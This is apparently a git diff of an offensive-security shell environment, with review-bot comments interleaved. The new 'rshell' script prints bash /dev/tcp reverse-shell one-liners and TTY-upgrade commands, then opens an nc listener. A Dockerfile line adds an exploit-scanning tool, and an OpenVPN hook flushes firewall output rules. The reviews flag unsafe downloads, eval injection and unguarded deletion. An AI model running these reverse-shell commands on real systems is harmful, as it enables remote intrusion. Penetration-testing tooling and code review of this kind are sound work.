diff --git a/guest/Dockerfile b/guest/Dockerfile
index 464ed82..0cab665 100644
--- a/guest/Dockerfile
+++ b/guest/Dockerfile
@@ -800,6 +800,7 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore '%arch:aarch64=arm%-unknown-linux'
 && /pkg-install.sh HACK ghbin praetorian-inc/noseyparker 'linux-' noseyparker \
 && /pkg-install.sh HACK bin 'https://gitlab.com/api/v4/projects/33695681/packages/generic/nrich/latest/nrich_latest_amd64.deb' `# x86_64 only` \
 && /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \
+ && /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \
 && /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r
 RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker \
 && /pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
diff --git a/guest/fs-root/sf/bin/rshell b/guest/fs-root/sf/bin/rshell
new file mode 100755
index 0000000..17e9920
--- /dev/null
+++ b/guest/fs-root/sf/bin/rshell
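Review bot: The added `sploitscan.py` line downloads from `raw/main`, a mutable branch of a third-party repository, so each image build bakes in whatever that branch holds at build time with no integrity check. Pin the URL to a reviewed commit, e.g. `https://github.com/xaitax/SploitScan/raw/<COMMIT_SHA>/sploitscan.py` (placeholder), and compare the file against a recorded SHA-256 if `/pkg-install.sh` offers that; the script is not visible here. The neighbouring RustScan line already pins a release (`2.0.1`), which is the pattern to follow. The RUN instruction this line belongs to starts above the hunk.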
@@ -0,0 +1,47 @@
+#! /usr/bin/env bash
+
+source /sf/bin/funcs.sh
+
+load() {
+ [[ ! -f "$2" ]] && return 255
+ eval "${1}=$(<"$2")"
+}
+
+ERREXIT() {
+ local code="$1"
+
+ shift 1
+ [[ -n $1 ]] && echo -e >&2 "${CR}ERROR:${CN} $*"
+
+ exit "${code:-99}"
+}
+
+load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
+load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
+echo -e "\
+Use any of these commands on the remote system:${CDR}
+ bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'
+ (bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &
+${CN}
+Once connected, cut & paste this into the remote shell:${CDC}
+command -v python >/dev/null \\
+ && exec python -c 'import pty; pty.spawn(\"bash\")' \\
+ || exec script -qc bash /dev/null
+
+export SHELL=/bin/bash
+export TERM=xterm-256color
+reset -I
+PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
+eval \$(resize)
+${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN}
+-----------------------------------"
+# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
+
+
+cfg=$(stty --save)
+stty raw -echo opost
+time nc -vnlp "$rport"
+echo "Restoring TTY"
+stty "$cfg"
+# reset -I
+
diff --git a/sfbin/ovpn_up.sh b/sfbin/ovpn_up.sh
new file mode 100644
index 0000000..ae8d927
--- /dev/null
+++ b/sfbin/ovpn_up.sh
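Review bot: `load()` runs the file contents through `eval "${1}=$(<"$2")"`, so anything in `/config/self/reverse_port` or `/config/self/reverse_ip` beyond a single bare token is executed as shell code instead of being stored. Assign without evaluation, `printf -v "$1" '%s' "$(<"$2")"`, and check the values before they are printed into the command templates and passed to `nc`, e.g. `[[ $rport =~ ^[0-9]+$ ]] || ERREXIT 255 "Bad reverse port"`. The failure message on the `load rip` line repeats "No reverse port found" and should name the reverse IP. Setting `trap 'stty "$cfg"' EXIT` right after `cfg=$(stty --save)` would also restore the terminal if the script is terminated while `nc` is running, which the straight-line `stty "$cfg"` does not cover.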
@@ -0,0 +1,22 @@
+#! /bin/bash
+# Executed by OpenVPN --up within master/OpenVPN context
+
+source /sf/bin/funcs_net.sh
+
+# echo "$*" >/tmp/up_args.txt
+# set >/tmp/up_set.txt
+
+[[ -z $WG_DEV ]] && WG_DEV="vpnEXIT"
+
+# Inside this context the PATH needs to be exported:
+export PATH
+
+# Add the OpenVPN PEER as default route
+nsenter.u1000 --setuid 0 --setgid 0 -t "${PID:?}" -n ip route add "${trusted_ip:?}" via "${SF_NET_LG_ROUTER_IP:?}" dev eth0
+# Remove old default route.
+set_route_post_up
+# Remove all BLOCKING OUTPUT rules that were needed between OpenVPN starting
+# and the device becoming available.
+nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F OUTPUT
+rm -rf "/tmp/lg-${LID}"
+
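Review bot: The `iptables -F OUTPUT` near the end runs unconditionally: the script sets no `set -e` and checks no exit status, so if the `ip route add` or `set_route_post_up` above it fails, the blocking OUTPUT rules are still flushed while routing may remain in its pre-VPN state. Stop before the flush on failure, e.g. append `|| exit 1` to the `ip route add` line and call `set_route_post_up || exit 1`; `set_route_post_up` comes from `funcs_net.sh`, which is not shown, so confirm it returns non-zero on failure. `rm -rf "/tmp/lg-${LID}"` should use `"${LID:?}"` like the other variables, so an empty or unset value aborts instead of operating on `/tmp/lg-`.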